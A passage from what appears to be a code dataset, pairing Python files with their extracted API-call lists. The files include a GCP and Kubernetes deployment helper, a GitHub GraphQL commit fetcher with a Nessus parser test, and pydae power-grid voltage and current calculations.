password=kwargs['password'],
region=kwargs['region'])
def wait_for_gcp_sql_operation(self, project_id: str, operation: dict, timeout=60 * 30):
operations_service = self._get_gcp_service('sqladmin', 'v1beta4').operations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(project=project_id, operation=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(f"Timed out waiting for Google Cloud SQL operation: {json.dumps(result,indent=2)}")
def get_gke_cluster(self, project_id: str, zone: str, name: str):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
try:
return clusters_service.get(projectId=project_id, zone=zone, clusterId=name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def get_gke_cluster_node_pool(self, project_id: str, zone: str, name: str, pool_name: str):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
try:
return clusters_service.nodePools().get(projectId=project_id,
zone=zone,
clusterId=name,
nodePoolId=pool_name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def get_gke_server_config(self, project_id: str, zone: str) -> dict:
service = self._get_gcp_service('container', 'v1')
return service.projects().zones().getServerconfig(projectId=project_id, zone=zone).execute()
def create_gke_cluster(self, project_id: str, zone: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.create(projectId=project_id, zone=zone, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_master_version(self,
project_id: str,
zone: str,
name: str,
version: str,
timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
body = {'masterVersion': version}
op = clusters_service.master(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.update(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_legacy_abac(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.legacyAbac(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_monitoring(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.monitoring(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_logging(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.logging(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_addons(self, project_id: str, zone: str, name: str, body: dict, timeout: int = 60 * 15):
clusters_service = self._get_gcp_service('container', 'v1').projects().zones().clusters()
op = clusters_service.addons(projectId=project_id, zone=zone, clusterId=name, body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def create_gke_cluster_node_pool(self,
project_id: str,
zone: str,
name: str,
node_pool_body: dict,
timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.create(projectId=project_id,
zone=zone,
clusterId=name,
body={"nodePool": node_pool_body}).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_node_pool(self,
project_id: str,
zone: str,
cluster_name: str,
pool_name: str,
body: dict, timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.update(projectId=project_id,
zone=zone,
clusterId=cluster_name,
nodePoolId=pool_name,
body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_node_pool_management(self,
project_id: str,
zone: str,
cluster_name: str,
pool_name: str,
body: dict, timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.setManagement(projectId=project_id,
zone=zone,
clusterId=cluster_name,
nodePoolId=pool_name,
body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def update_gke_cluster_node_pool_autoscaling(self,
project_id: str,
zone: str,
cluster_name: str,
pool_name: str,
body: dict, timeout: int = 60 * 15):
pools_service = self._get_gcp_service('container', 'v1').projects().zones().clusters().nodePools()
op = pools_service.autoscaling(projectId=project_id,
zone=zone,
clusterId=cluster_name,
nodePoolId=pool_name,
body=body).execute()
self.wait_for_gke_zonal_operation(project_id=project_id, zone=zone, operation=op, timeout=timeout)
def wait_for_gke_zonal_operation(self, project_id: str, zone: str, operation: dict,
timeout: int = 60 * 15):
operations_service = self._get_gcp_service('container', 'v1').projects().zones().operations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(projectId=project_id, zone=zone, operationId=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(f"Timed out waiting for GKE zonal operation: {json.dumps(result,indent=2)}")
def generate_gcloud_access_token(self, json_credentials_file: Path) -> str:
# first, make gcloud use our service account
command = f"gcloud auth activate-service-account --key-file={json_credentials_file}"
subprocess.run(command, check=True, shell=True)
# extract our service account's GCP access token
process = subprocess.run(f"gcloud auth print-access-token", check=True, shell=True, stdout=subprocess.PIPE)
return process.stdout.decode('utf-8').strip()
def get_gcp_compute_regional_ip_address(self, project_id: str, region: str, name: str) -> Union[None, dict]:
try:
return self._get_gcp_service('compute', 'v1').addresses().get(project=project_id,
region=region,
address=name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def create_gcp_compute_regional_ip_address(self, project_id: str, region: str, name: str, timeout: int = 60 * 5):
addresses_service = self._get_gcp_service('compute', 'v1').addresses()
result = addresses_service.insert(project=project_id,
region=region,
body={'name': name}).execute()
self.wait_for_gcp_compute_regional_operation(project_id=project_id,
region=region,
operation=result,
timeout=timeout)
def wait_for_gcp_compute_regional_operation(self,
project_id: str,
region: str,
operation: dict,
timeout: int = 60 * 5):
operations_service = self._get_gcp_service('compute', 'v1').regionOperations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(project=project_id, region=region, operation=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(
f"Timed out waiting for Google Compute regional operation: {json.dumps(result,indent=2)}")
def get_gcp_compute_global_ip_address(self, project_id: str, name: str) -> Union[None, dict]:
try:
return self._get_gcp_service('compute', 'v1').globalAddresses().get(project=project_id,
address=name).execute()
except HttpError as e:
if e.resp.status == 404:
return None
else:
raise
def create_gcp_compute_global_ip_address(self, project_id: str, name: str, timeout: int = 60 * 5):
addresses_service = self._get_gcp_service('compute', 'v1').globalAddresses()
result = addresses_service.insert(project=project_id, body={'name': name}).execute()
self.wait_for_gcp_compute_global_operation(project_id=project_id, operation=result, timeout=timeout)
def wait_for_gcp_compute_global_operation(self, project_id: str, operation: dict, timeout: int = 60 * 5):
operations_service = self._get_gcp_service('compute', 'v1').globalOperations()
interval = 5
counter = 0
while True:
sleep(interval)
counter = counter + interval
result = operations_service.get(project=project_id, operation=operation['name']).execute()
if 'status' in result and result['status'] == 'DONE':
if 'error' in result:
raise Exception("ERROR: %s" % json.dumps(result['error']))
else:
return result
if counter >= timeout:
raise Exception(f"Timed out waiting for Google Compute global operation: {json.dumps(result,indent=2)}")
def find_k8s_cluster_object(self, manifest: dict) -> Union[None, dict]:
cmd = f"kubectl get {manifest['kind']} {manifest['metadata']['name']} --ignore-not-found=true --output=json"
process = subprocess.run(f"{cmd}", shell=True, check=True, stdout=subprocess.PIPE)
return json.loads(process.stdout) if process.stdout else None
def find_k8s_namespace_object(self, manifest: dict) -> Union[None, dict]:
metadata: dict = manifest['metadata']
kind: str = manifest['kind']
name: str = metadata['name']
namespace: str = metadata['namespace']
cmd: str = f"kubectl get --namespace {namespace} {kind} {name} --ignore-not-found=true --output=json"
process = subprocess.run(f"{cmd}", shell=True, check=True, stdout=subprocess.PIPE)
return json.loads(process.stdout) if process.stdout else None
def create_k8s_object(self, manifest: dict, timeout: int = 60 * 5, verbose: bool = False) -> None:
if verbose:
print(f"Creating Kubernetes object from:\n{json.dumps(manifest, indent=2)}")
subprocess.run(f"kubectl create --save-config=true -f -",
input=json.dumps(manifest),
encoding='utf-8',
check=True,
timeout=timeout,
shell=True)
def update_k8s_object(self, manifest: dict, timeout: int = 60 * 5, force: bool = False, verbose: bool = False) \
-> None:
if verbose:
print(f"Updating Kubernetes object from:\n{json.dumps(manifest, indent=2)}")
subprocess.run(f"kubectl apply --force={'true' if force else 'false'} -f -",
input=json.dumps(manifest),
encoding='utf-8',
check=True,
timeout=timeout,
shell=True)
| [
"json.loads",
"subprocess.Popen",
"subprocess.run",
"pymysql.connect",
"json.dumps",
"time.sleep",
"pprint.pformat",
"googleapiclient.discovery.build"
] | [((1571, 1761), 'subprocess.Popen', 'subprocess.Popen', (["[f'/usr/local/bin/cloud_sql_proxy',\n f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',\n f'-credential_file=/deployster/service-account.json']"], {}), "([f'/usr/local/bin/cloud_sql_proxy',\n f'-instances={self._project_id}:{self._region}:{self._instance}=tcp:3306',\n f'-credential_file=/deployster/service-account.json'])\n", (1587, 1761), False, 'import subprocess\n'), ((2089, 2273), 'pymysql.connect', 'pymysql.connect', ([], {'host': '"""localhost"""', 'port': '(3306)', 'user': 'self._username', 'password': 'self._password', 'db': '"""INFORMATION_SCHEMA"""', 'charset': '"""utf8mb4"""', 'cursorclass': 'pymysql.cursors.DictCursor'}), "(host='localhost', port=3306, user=self._username, password=\n self._password, db='INFORMATION_SCHEMA', charset='utf8mb4', cursorclass\n =pymysql.cursors.DictCursor)\n", (2104, 2273), False, 'import pymysql\n'), ((3194, 3241), 'subprocess.run', 'subprocess.run', (['command'], {'shell': '(True)', 'check': '(True)'}), '(command, shell=True, check=True)\n', (3208, 3241), False, 'import subprocess\n'), ((23825, 23872), 'subprocess.run', 'subprocess.run', (['command'], {'check': '(True)', 'shell': '(True)'}), '(command, check=True, shell=True)\n', (23839, 23872), False, 'import subprocess\n'), ((23949, 24050), 'subprocess.run', 'subprocess.run', (['f"""gcloud auth print-access-token"""'], {'check': '(True)', 'shell': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'gcloud auth print-access-token', check=True, shell=True,\n stdout=subprocess.PIPE)\n", (23963, 24050), False, 'import subprocess\n'), ((28278, 28350), 'subprocess.run', 'subprocess.run', (['f"""{cmd}"""'], {'shell': '(True)', 'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'{cmd}', shell=True, check=True, stdout=subprocess.PIPE)\n", (28292, 28350), False, 'import subprocess\n'), ((28795, 28867), 'subprocess.run', 'subprocess.run', (['f"""{cmd}"""'], {'shell': '(True)', 'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(f'{cmd}', shell=True, check=True, stdout=subprocess.PIPE)\n", (28809, 28867), False, 'import subprocess\n'), ((3688, 3736), 'googleapiclient.discovery.build', 'build', ([], {'serviceName': 'service_name', 'version': 'version'}), '(serviceName=service_name, version=version)\n', (3693, 3736), False, 'from googleapiclient.discovery import build\n'), ((6735, 6743), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (6740, 6743), False, 'from time import sleep\n'), ((7441, 7449), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (7446, 7449), False, 'from time import sleep\n'), ((14230, 14245), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (14235, 14245), False, 'from time import sleep\n'), ((23032, 23047), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (23037, 23047), False, 'from time import sleep\n'), ((25799, 25814), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (25804, 25814), False, 'from time import sleep\n'), ((27509, 27524), 'time.sleep', 'sleep', (['interval'], {}), '(interval)\n', (27514, 27524), False, 'from time import sleep\n'), ((28366, 28392), 'json.loads', 'json.loads', (['process.stdout'], {}), '(process.stdout)\n', (28376, 28392), False, 'import json\n'), ((28883, 28909), 'json.loads', 'json.loads', (['process.stdout'], {}), '(process.stdout)\n', (28893, 28909), False, 'import json\n'), ((29246, 29266), 'json.dumps', 'json.dumps', (['manifest'], {}), '(manifest)\n', (29256, 29266), False, 'import json\n'), ((29781, 29801), 'json.dumps', 'json.dumps', (['manifest'], {}), '(manifest)\n', (29791, 29801), False, 'import json\n'), ((9798, 9834), 'pprint.pformat', 'pformat', (["existing_policy['bindings']"], {}), "(existing_policy['bindings'])\n", (9805, 9834), False, 'from pprint import pformat\n'), ((9932, 9949), 'pprint.pformat', 'pformat', (['bindings'], {}), '(bindings)\n', (9939, 9949), False, 'from pprint import pformat\n'), ((29117, 29147), 'json.dumps', 'json.dumps', (['manifest'], {'indent': '(2)'}), '(manifest, indent=2)\n', (29127, 29147), False, 'import json\n'), ((29633, 29663), 'json.dumps', 'json.dumps', (['manifest'], {'indent': '(2)'}), '(manifest, indent=2)\n', (29643, 29663), False, 'import json\n'), ((14546, 14573), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (14556, 14573), False, 'import json\n'), ((14751, 14779), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (14761, 14779), False, 'import json\n'), ((23361, 23388), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (23371, 23388), False, 'import json\n'), ((23559, 23587), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (23569, 23587), False, 'import json\n'), ((26130, 26157), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (26140, 26157), False, 'import json\n'), ((26363, 26391), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (26373, 26391), False, 'import json\n'), ((27825, 27852), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (27835, 27852), False, 'import json\n'), ((28035, 28063), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (28045, 28063), False, 'import json\n'), ((7049, 7076), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (7059, 7076), False, 'import json\n'), ((7159, 7177), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (7169, 7177), False, 'import json\n'), ((7755, 7782), 'json.dumps', 'json.dumps', (["result['error']"], {}), "(result['error'])\n", (7765, 7782), False, 'import json\n'), ((7865, 7883), 'json.dumps', 'json.dumps', (['result'], {}), '(result)\n', (7875, 7883), False, 'import json\n')] |
import logging
from typing import List, Optional
from src.constants import PR_FILES
from src.data.github.graphql.models import RawCommit
from src.data.github.graphql.template import (
GraphQLError,
GraphQLErrorAuth,
GraphQLErrorMissingNode,
GraphQLErrorTimeout,
get_template,
)
def get_commits(
node_ids: List[str], access_token: Optional[str] = None
) -> List[Optional[RawCommit]]:
"""
Gets all repository data from graphql
:param access_token: GitHub access token
:param node_ids: List of node ids
:return: List of commits
"""
if PR_FILES == 0: # type: ignore
query = {
"variables": {"ids": node_ids},
"query": """
query getCommits($ids: [ID!]!) {
nodes(ids: $ids) {
... on Commit {
additions
deletions
changedFiles
url
}
}
}
""",
}
else:
query = {
"variables": {"ids": node_ids, "first": PR_FILES},
"query": """
query getCommits($ids: [ID!]!, $first: Int!) {
nodes(ids: $ids) {
... on Commit {
additions
deletions
changedFiles
url
associatedPullRequests(first: 1) {
nodes {
changedFiles
additions
deletions
files(first: $first) {
nodes {
path
additions
deletions
}
}
}
}
}
}
}
""",
}
try:
raw_commits = get_template(query, access_token)["data"]["nodes"]
except GraphQLErrorMissingNode as e:
return (
get_commits(node_ids[: e.node], access_token)
+ [None]
+ get_commits(node_ids[e.node + 1 :], access_token)
)
except (GraphQLErrorAuth, GraphQLErrorTimeout):
return [None for _ in node_ids]
except GraphQLError as e:
logging.exception(e)
return [None for _ in node_ids]
out: List[Optional[RawCommit]] = []
for raw_commit in raw_commits:
try:
if "associatedPullRequests" not in raw_commit:
raw_commit["associatedPullRequests"] = {"nodes": []}
out.append(RawCommit.parse_obj(raw_commit))
except Exception as e:
logging.exception(e)
out.append(None)
return out
| [
"src.data.github.graphql.models.RawCommit.parse_obj",
"src.data.github.graphql.template.get_template",
"logging.exception"
] | [((2516, 2536), 'logging.exception', 'logging.exception', (['e'], {}), '(e)\n', (2533, 2536), False, 'import logging\n'), ((2124, 2157), 'src.data.github.graphql.template.get_template', 'get_template', (['query', 'access_token'], {}), '(query, access_token)\n', (2136, 2157), False, 'from src.data.github.graphql.template import GraphQLError, GraphQLErrorAuth, GraphQLErrorMissingNode, GraphQLErrorTimeout, get_template\n'), ((2817, 2848), 'src.data.github.graphql.models.RawCommit.parse_obj', 'RawCommit.parse_obj', (['raw_commit'], {}), '(raw_commit)\n', (2836, 2848), False, 'from src.data.github.graphql.models import RawCommit\n'), ((2893, 2913), 'logging.exception', 'logging.exception', (['e'], {}), '(e)\n', (2910, 2913), False, 'import logging\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_ness
----------------------------------
Tests for `ness` module.
"""
import pytest
import ness
def test_parse_report():
report = ness.from_file('sample.nessus')
assert len(report.get('hosts')) == 1
print(report)
def test_parse_from_file():
with pytest.raises(FileNotFoundError):
ness.from_file('not-existant-path')
| [
"pytest.raises",
"ness.from_file"
] | [((195, 226), 'ness.from_file', 'ness.from_file', (['"""sample.nessus"""'], {}), "('sample.nessus')\n", (209, 226), False, 'import ness\n'), ((325, 357), 'pytest.raises', 'pytest.raises', (['FileNotFoundError'], {}), '(FileNotFoundError)\n', (338, 357), False, 'import pytest\n'), ((367, 402), 'ness.from_file', 'ness.from_file', (['"""not-existant-path"""'], {}), "('not-existant-path')\n", (381, 402), False, 'import ness\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
2020
@author: jmmauricio
"""
import numpy as np
from pydae.tools import get_v,get_i,get_s
import json
from collections import namedtuple
import numba
class grid(object):
def __init__(self,syst):
#def bokeh_tools(data):
self.syst = syst
self.s_radio_scale = 0.01
self.s_radio_max = 20
self.s_radio_min = 1
with np.load('matrices.npz') as data:
Y_primitive = data['Y_primitive']
A_conect = data['A_conect']
nodes_list = data['nodes_list']
node_sorter = data['node_sorter']
Y_vv = data['Y_vv']
Y_vi = data['Y_vi']
N_v = int(data['N_v'])
self.nodes_list = nodes_list
self.Y_primitive = Y_primitive
self.A_conect = A_conect
self.node_sorter = node_sorter
self.Y_vv = Y_vv
self.Y_vi = Y_vi
self.N_v = N_v
json_file = 'grid_data.json'
json_file = json_file
json_data = open(json_file).read().replace("'",'"')
data = json.loads(json_data)
self.buses = data['buses']
if 'transformers' in data:
self.transformers = data['transformers']
else:
self.transformers = []
self.lines = data['lines']
self.loads = data['loads']
if 'vscs' in data:
self.vscs = data['vscs']
else: self.vscs = []
def dae2vi(self):
'''
For obtaining line currents from node voltages after power flow is solved.
Returns
-------
None.
'''
n2a = {'1':'a','2':'b','3':'c','4':'n'}
a2n = {'a':1,'b':2,'c':3,'n':4}
V_node_list = []
I_node_list = [0.0]*len(self.nodes_list)
self.I_node_list = I_node_list
for item in self.nodes_list:
bus_name,phase_name = item.split('.')
#i = get_i(self.syst,bus_name,phase_name=n2a[phase_name],i_type='phasor',dq_name='ri')
#I_node_list += [i]
v = get_v(self.syst,bus_name,phase_name=n2a[phase_name],v_type='phasor',dq_name='ri')
V_node_list += [v]
V_node = np.array(V_node_list).reshape(len(V_node_list),1)
V_known = np.copy(V_node[:self.N_v])
V_unknown = np.copy(V_node[self.N_v:])
I_unknown = self.Y_vv @ V_known + self.Y_vi @ V_unknown
#self.I_node = I_node
self.V_node = V_node
self.I_unknown = I_unknown
self.I_known = np.array(I_node_list).reshape(len(I_node_list),1)
self.I_node = np.vstack((self.I_unknown,self.I_known))
for load in self.loads:
bus_name = load['bus']
if load['type'] == '3P+N':
for ph in ['a','b','c','n']:
idx = list(self.nodes_list).index(f"{load['bus']}.{a2n[ph]}")
i_ = get_i(self.syst,'load_' + bus_name,phase_name=ph,i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
if load['type'] == '1P+N':
ph = load['bus_nodes'][0]
idx = list(self.nodes_list).index(f"{load['bus']}.{ph}")
i_ = get_i(self.syst,'load_' + bus_name,phase_name=n2a[str(ph)],i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
ph = load['bus_nodes'][1]
idx = list(self.nodes_list).index(f"{load['bus']}.{ph}")
i_ = get_i(self.syst,'load_' + bus_name,phase_name=n2a[str(ph)],i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
for vsc in self.vscs:
bus_name = vsc['bus_ac']
phases = ['a','b','c','n']
if vsc['type'] == 'ac3ph3wvdcq' or vsc['type'] == 'ac3ph3wpq':
phases = ['a','b','c']
for ph in phases:
idx = list(self.nodes_list).index(f"{vsc['bus_ac']}.{a2n[ph]}")
i_ = get_i(self.syst,'vsc_' + bus_name,phase_name=ph,i_type='phasor',dq_name='ri')
self.I_node[idx] += i_
if not vsc['type'] == 'ac3ph3wvdcq' or vsc['type'] == 'ac3ph3wpq':
bus_name = vsc['bus_dc']
for ph in ['a','n']:
idx = list(self.nodes_list).index(f"{vsc['bus_dc']}.{a2n[ph]}")
i_ = get_i(self.syst,'vsc_' + bus_name,phase_name=ph,i_type='phasor',dq_name='r')
self.I_node[idx] += i_
I_lines = self.Y_primitive @ self.A_conect.T @ self.V_node
self.I_lines = I_lines
def get_v(self):
'''
Compute phase-neutral and phase-phase voltages from power flow solution and put values
in buses dictionary.
'''
res = {}
V_sorted = []
I_sorted = []
S_sorted = []
start_node = 0
self.V_results = self.V_node
# self.I_results = self.I_node
V_sorted = self.V_node[self.node_sorter]
I_sorted = self.I_node[self.node_sorter]
nodes2string = ['v_an','v_bn','v_cn','v_gn']
for bus in self.buses:
N_nodes = bus['N_nodes']
# for node in range(5):
# bus_node = '{:s}.{:s}'.format(str(bus['bus']),str(node))
# if bus_node in self.nodes:
# V = self.V_results[self.nodes.index(bus_node)][0]
# V_sorted += [V]
# nodes_in_bus += [node]
# for node in range(5):
# bus_node = '{:s}.{:s}'.format(str(bus['bus']),str(node))
# if bus_node in self.nodes:
# I = self.I_results[self.nodes.index(bus_node)][0]
# I_sorted += [I]
if N_nodes==3: # if 3 phases
v_ag = V_sorted[start_node+0,0]
v_bg = V_sorted[start_node+1,0]
v_cg = V_sorted[start_node+2,0]
i_a = I_sorted[start_node+0,0]
i_b = I_sorted[start_node+1,0]
i_c = I_sorted[start_node+2,0]
s_a = (v_ag)*np.conj(i_a)
s_b = (v_bg)*np.conj(i_b)
s_c = (v_cg)*np.conj(i_c)
start_node += 3
bus.update({'v_an':np.abs(v_ag),
'v_bn':np.abs(v_bg),
'v_cn':np.abs(v_cg),
'v_ng':0.0})
bus.update({'deg_an':np.angle(v_ag, deg=True),
'deg_bn':np.angle(v_bg, deg=True),
'deg_cn':np.angle(v_cg, deg=True),
'deg_ng':np.angle(0, deg=True)})
bus.update({'v_ab':np.abs(v_ag-v_bg),
'v_bc':np.abs(v_bg-v_cg),
'v_ca':np.abs(v_cg-v_ag)})
bus.update({'p_a':s_a.real,
'p_b':s_b.real,
'p_c':s_c.real})
bus.update({'q_a':s_a.imag,
'q_b':s_b.imag,
'q_c':s_c.imag})
tup = namedtuple('tup',['v_ag', 'v_bg', 'v_cg'])
res.update({bus['bus']:tup(v_ag,v_bg,v_cg)})
if N_nodes==4: # if 3 phases + neutral
v_ag = V_sorted[start_node+0,0]
v_bg = V_sorted[start_node+1,0]
v_cg = V_sorted[start_node+2,0]
v_ng = V_sorted[start_node+3,0]
i_a = I_sorted[start_node+0,0]
i_b = I_sorted[start_node+1,0]
i_c = I_sorted[start_node+2,0]
i_n = I_sorted[start_node+3,0]
v_an = v_ag-v_ng
v_bn = v_bg-v_ng
v_cn = v_cg-v_ng
s_a = (v_an)*np.conj(i_a)
s_b = (v_bn)*np.conj(i_b)
s_c = (v_cn)*np.conj(i_c)
bus.update({'v_an':np.abs(v_an),
'v_bn':np.abs(v_bn),
'v_cn':np.abs(v_cn),
'v_ng':np.abs(v_ng)})
bus.update({'deg_an':np.angle(v_ag-v_ng, deg=True),
'deg_bn':np.angle(v_bg-v_ng, deg=True),
'deg_cn':np.angle(v_cg-v_ng, deg=True),
'deg_ng':np.angle(v_ng, deg=True)})
bus.update({'v_ab':np.abs(v_ag-v_bg),
'v_bc':np.abs(v_bg-v_cg),
'v_ca':np.abs(v_cg-v_ag)})
bus.update({'p_a':s_a.real,
'p_b':s_b.real,
'p_c':s_c.real})
bus.update({'q_a':s_a.imag,
'q_b':s_b.imag,
'q_c':s_c.imag})
start_node += 4
tup = namedtuple('tup',['v_ag', 'v_bg', 'v_cg', 'v_ng','v_an', 'v_bn', 'v_cn'])
res.update({bus['bus']:tup(v_ag,v_bg,v_cg,v_ng,v_an,v_bn,v_cn)})
self.V = np.array(V_sorted).reshape(len(V_sorted),1)
self.res = res
return 0 #self.V
def get_i(self):
'''
Compute line currents from power flow solution and put values
in transformers and lines dictionaries.
'''
I_lines =self.I_lines
it_single_line = 0
for trafo in self.transformers:
if 'conductors_j' in trafo:
cond_1 = trafo['conductors_j']
else:
cond_1 = trafo['conductors_1']
if 'conductors_k' in trafo:
cond_2 = trafo['conductors_k']
else:
cond_2 = trafo['conductors_2']
I_1a = (I_lines[it_single_line,0])
I_1b = (I_lines[it_single_line+1,0])
I_1c = (I_lines[it_single_line+2,0])
I_1n = (I_lines[it_single_line+3,0])
I_2a = (I_lines[it_single_line+cond_1+0,0])
I_2b = (I_lines[it_single_line+cond_1+1,0])
I_2c = (I_lines[it_single_line+cond_1+2,0])
if cond_1>3: I_1n = (I_lines[it_single_line+cond_1+3,0])
if cond_2>3: I_2n = (I_lines[it_single_line+cond_2+3,0])
#I_n = (I_lines[it_single_line+3,0])
if cond_1 <=3:
I_1n = I_1a+I_1b+I_1c
if cond_2 <=3:
I_2n = I_2a+I_2b+I_2c
it_single_line += cond_1 + cond_2
trafo.update({'i_1a_m':np.abs(I_1a)})
trafo.update({'i_1b_m':np.abs(I_1b)})
trafo.update({'i_1c_m':np.abs(I_1c)})
trafo.update({'i_1n_m':np.abs(I_1n)})
trafo.update({'i_2a_m':np.abs(I_2a)})
trafo.update({'i_2b_m':np.abs(I_2b)})
trafo.update({'i_2c_m':np.abs(I_2c)})
trafo.update({'i_2n_m':np.abs(I_2n)})
trafo.update({'deg_1a':np.angle(I_1a, deg=True)})
trafo.update({'deg_1b':np.angle(I_1b, deg=True)})
trafo.update({'deg_1c':np.angle(I_1c, deg=True)})
trafo.update({'deg_1n':np.angle(I_1n, deg=True)})
trafo.update({'deg_2a':np.angle(I_2a, deg=True)})
trafo.update({'deg_2b':np.angle(I_2b, deg=True)})
trafo.update({'deg_2c':np.angle(I_2c, deg=True)})
trafo.update({'deg_2n':np.angle(I_2n, deg=True)})
self.I_lines = I_lines
for line in self.lines:
if line['type'] == 'z':
N_conductors = len(line['bus_j_nodes'])
if N_conductors == 3:
I_a = (I_lines[it_single_line,0])
I_b = (I_lines[it_single_line+1,0])
I_c = (I_lines[it_single_line+2,0])
#I_n = (I_lines[it_single_line+3,0])
I_n = I_a+I_b+I_c
alpha = alpha = np.exp(2.0/3*np.pi*1j)
i_z = 1/3*(I_a+I_b+I_c)
i_p = 1.0/3.0*(I_a + I_b*alpha + I_c*alpha**2)
i_n = 1.0/3.0*(I_a + I_b*alpha**2 + I_c*alpha)
it_single_line += N_conductors
line.update({'i_j_a_m':np.abs(I_a)})
line.update({'i_j_b_m':np.abs(I_b)})
line.update({'i_j_c_m':np.abs(I_c)})
line.update({'i_j_n_m':np.abs(I_n)})
line.update({'deg_j_a':np.angle(I_a, deg=True)})
line.update({'deg_j_b':np.angle(I_b, deg=True)})
line.update({'deg_j_c':np.angle(I_c, deg=True)})
line.update({'deg_j_n':np.angle(I_n, deg=True)})
line.update({'i_k_a_m':np.abs(I_a)})
line.update({'i_k_b_m':np.abs(I_b)})
line.update({'i_k_c_m':np.abs(I_c)})
line.update({'i_k_n_m':np.abs(I_n)})
line.update({'deg_k_a':np.angle(I_a, deg=True)})
line.update({'deg_k_b':np.angle(I_b, deg=True)})
line.update({'deg_k_c':np.angle(I_c, deg=True)})
line.update({'deg_k_n':np.angle(I_n, deg=True)})
line.update({'i_z':np.abs(i_z)})
line.update({'i_p':np.abs(i_p)})
line.update({'i_n':np.abs(i_n)})
if N_conductors == 4:
I_a = (I_lines[it_single_line,0])
I_b = (I_lines[it_single_line+1,0])
I_c = (I_lines[it_single_line+2,0])
I_n = (I_lines[it_single_line+3,0])
it_single_line += N_conductors
line.update({'i_j_a_m':np.abs(I_a)})
line.update({'i_j_b_m':np.abs(I_b)})
line.update({'i_j_c_m':np.abs(I_c)})
